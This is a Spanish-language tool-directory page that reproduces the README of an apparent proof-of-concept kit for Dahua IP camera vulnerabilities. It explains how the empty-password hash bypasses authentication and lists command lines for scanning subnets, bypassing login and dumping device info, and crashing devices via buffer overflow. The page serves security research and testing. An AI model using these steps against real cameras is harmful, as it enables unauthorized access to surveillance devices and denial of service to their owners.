Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
dahua-cve-research — Kit de investigación de CVEs para cámaras IP Dahua (CVE-2021-33044/33045, CVE-2025-31700/31701) | Kitploit
Herramientas/GitHubGitHub/umair-aziz025/dahua-cve-research
Seguridad IoTMapeo de RedesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónAprendizaje y Educación
GitHubumair-aziz025/dahua-cve-research

dahua-cve-research

Kit de investigación de CVEs para cámaras IP Dahua (CVE-2021-33044/33045, CVE-2025-31700/31701)

Ver Repositorio
216hace 4 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Herramientas de Exploit CVE para Cámaras IP Dahua

⚠️ EN DESARROLLO — Estos scripts se basan en detalles de CVE publicados y requieren pruebas adicionales contra dispositivos vulnerables para confirmar su plena funcionalidad.

Scripts de investigación y prueba de concepto para cuatro vulnerabilidades críticas de cámaras IP Dahua.


⚠️ AVISO LEGAL

root@kitploit:~
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.

By using these tools, you agree that:
  1. You have EXPLICIT WRITTEN AUTHORIZATION to test the target systems
  2. You will NOT use these tools for illegal activities
  3. You accept full responsibility for your actions
  4. The authors are NOT liable for any misuse or damage

Unauthorized access to computer systems is a CRIMINAL OFFENSE in most jurisdictions.

CVEs cubiertos

CVECVSSTipoEstado
CVE-2021-330449.8 CRÍTICOOmisión de autenticaciónCISA KEV (explotado activamente)
CVE-2021-330459.8 CRÍTICOOmisión de autenticaciónCISA KEV (explotado activamente)
CVE-2025-317008.1 ALTODoS por desbordamiento de búferReciente (2025)
CVE-2025-317018.1 ALTODoS por desbordamiento de búferReciente (2025)

CVE-2021-33044 y CVE-2021-33045 — Omisión de autenticación

  • CVSS: 9.8 CRÍTICO
  • CWE: CWE-287 (Autenticación incorrecta)
  • Mecanismo: El inicio de sesión RPC2 acepta un hash de contraseña vacía, otorgando acceso de administrador
  • Afectados: IPC-HUM7xxx, IPC-HX3xxx/HX5xxx, TPC-, VTO-, VTH-, NVR-, XVR-*
  • Corregido en: Firmware 2.820.x+ (IPC) / 4.001.x+ (NVR/XVR)
  • Referencias:
    • NVD CVE-2021-33044
    • NVD CVE-2021-33045
    • Catálogo CISA KEV

CVE-2025-31700 y CVE-2025-31701 — Desbordamiento de búfer (DoS/RCE)

  • CVSS: 8.1 ALTO
  • CWE: CWE-120 (Copia en búfer sin comprobar el tamaño de la entrada)
  • Mecanismo: Los paquetes sobredimensionados provocan un desbordamiento de búfer → caída o posible RCE
  • Referencias:
    • NVD CVE-2025-31700
    • Aviso de seguridad de Dahua

Cómo funciona la omisión de autenticación

Las cámaras Dahua utilizan autenticación de desafío-respuesta a través de /RPC2_Login:

root@kitploit:~
Normal Login:
  step1 = MD5("admin:realm:PASSWORD")
  step2 = MD5("step1:random:step1")

Bypass (CVE-2021-33044/45):
  step1 = MD5("admin:realm:")      ← EMPTY password
  step2 = MD5("step1:random:step1")

El firmware vulnerable acepta el hash de contraseña vacía y devuelve un token de sesión válido.


Scripts


Instalación

root@kitploit:~
# Clone repository
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit

# Install dependencies
pip install requests

Uso

Escáner de red

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081

# Single host with port
python dahua_scanner.py 192.168.1.100:8081

# Full options
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json

# Show help
python dahua_scanner.py --help

Puertos Dahua comunes: 80, 8000, 8080, 8081, 8888, 9000, 443, 37777

Exploit Multi-CVE (Recomendado)

root@kitploit:~
python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044  # Single CVE
python dahua_exploit.py --help

Omisión de autenticación

root@kitploit:~
python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump  # Dump device info after bypass

DoS por desbordamiento de búfer

root@kitploit:~
python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http  # HTTP only
python dahua_rce.py 192.168.1.100 --cve tcp   # TCP/37777 only

⚠️ ADVERTENCIA: El script DoS puede bloquear el dispositivo objetivo.


Dependencias

root@kitploit:~
requests

Todos los demás imports provienen de la biblioteca estándar de Python: socket, struct, hashlib, threading, ipaddress, argparse, json


Estado de desarrollo

🚧 EN DESARROLLO ACTIVO

Estos scripts se han desarrollado con base en:

  • Detalles de CVE publicados por NVD
  • Avisos de seguridad de Dahua
  • Referencias públicas de PoC (seclists.org, packetstormsecurity)

Estado de las pruebas:

  • ✅ Lógica de omisión de autenticación implementada según las especificaciones de los CVE
  • ✅ Payloads de desbordamiento de búfer construidos según los avisos
  • ⚠️ Pruebas limitadas contra dispositivos vulnerables reales
  • ⚠️ Se necesita validación adicional en diversas versiones de firmware

Si tienes acceso a dispositivos vulnerables para realizar pruebas, las contribuciones y los comentarios son bienvenidos.


Contribuciones

  1. Haz un fork del repositorio
  2. Crea una rama de características
  3. Prueba tus cambios
  4. Envía una pull request

Informa de cualquier problema o falso positivo.


Referencias

  • NVD - CVE-2021-33044
  • NVD - CVE-2021-33045
  • NVD - CVE-2025-31700
  • NVD - CVE-2025-31701
  • CISA Known Exploited Vulnerabilities
  • Dahua Security Center
  • Bashis PoC - Seclists

Licencia

Licencia MIT: consulta el archivo LICENSE.


Autor

Umair Aziz
GitHub: @umair-aziz025


Solo para fines educativos y de investigación de seguridad autorizada.

Descargar herramienta
ArchivoPropósitoCVEs
dahua_scanner.pyDescubrimiento de red — encuentra cámaras Dahua en la subredDetección
dahua_exploit.pyEscáner multi-CVE — prueba todas las vulnerabilidadesTodas
dahua_auth_bypass.pyOmisión de autenticación dedicada con la opción --dumpCVE-2021-33044/45
dahua_rce.pySonda de DoS por desbordamiento de búferCVE-2025-31700/01